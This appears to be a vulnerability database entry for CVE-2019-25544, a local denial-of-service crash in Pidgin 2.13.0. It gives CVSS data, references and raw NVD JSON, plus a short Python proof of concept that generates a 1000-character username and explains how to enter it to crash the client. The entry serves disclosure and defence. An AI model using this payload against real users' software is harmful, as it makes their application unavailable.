CVE-2019-25544

Description

Pidgin 2.13.0 contains a denial of service vulnerability that allows local attackers to crash the application by providing an excessively long username string during account creation. Attackers can input a buffer of 1000 characters in the username field and trigger a crash when joining a chat, causing the application to become unavailable.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:pidgin:pidgin:2.13.0:*:*:*:*:*:*:* - VULNERABLE

Pidgin 2.13.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2019-25544
# This script generates the payload that triggers the crash in Pidgin 2.13.0

import sys

def generate_payload(length=1000):
    """
    Generates a string of 'A' characters with the specified length.
    Pidgin 2.13.0 crashes when a username of ~1000 chars is used during chat join.
    """
    return "A" * length

if __name__ == "__main__":
    print("[*] Generating payload for CVE-2019-25544...")
    payload = generate_payload()
    print(f"[+] Payload generated (Length: {len(payload)})")
    print("[+] Usage: Use this string as the 'Username' when creating a new account in Pidgin, then attempt to join a chat.")
    # print(payload) # Uncomment to see the full string

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25544
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25544
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25544/
[4] VulDB https://vuldb.com/cve/CVE-2019-25544
[5] https://pidgin.im/
[6] https://www.exploit-db.com/exploits/46930
[7] https://www.vulncheck.com/advisories/pidgin-denial-of-service-via-malformed-username

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25544", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:15.270", "lastModified": "2026-04-16T17:42:51.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pidgin 2.13.0 contains a denial of service vulnerability that allows local attackers to crash the application by providing an excessively long username string during account creation. Attackers can input a buffer of 1000 characters in the username field and trigger a crash when joining a chat, causing the application to become unavailable."}, {"lang": "es", "value": "Pidgin 2.13.0 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales colapsar la aplicación al proporcionar una cadena de nombre de usuario excesivamente larga durante la creación de la cuenta. Los atacantes pueden introducir un búfer de 1000 caracteres en el campo de nombre de usuario y provocar un colapso al unirse a un chat, haciendo que la aplicación deje de estar disponible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-807"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pidgin:pidgin:2.13.0:*:*:*:*:*:*:*", "matchCriteriaId": "87BA085C-A707-40AD-8CBC-885D111E1173"}]}]}], "references": [{"url": "https://pidgin.im/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46930", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/pidgin-denial-of-service-via-malformed-username", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}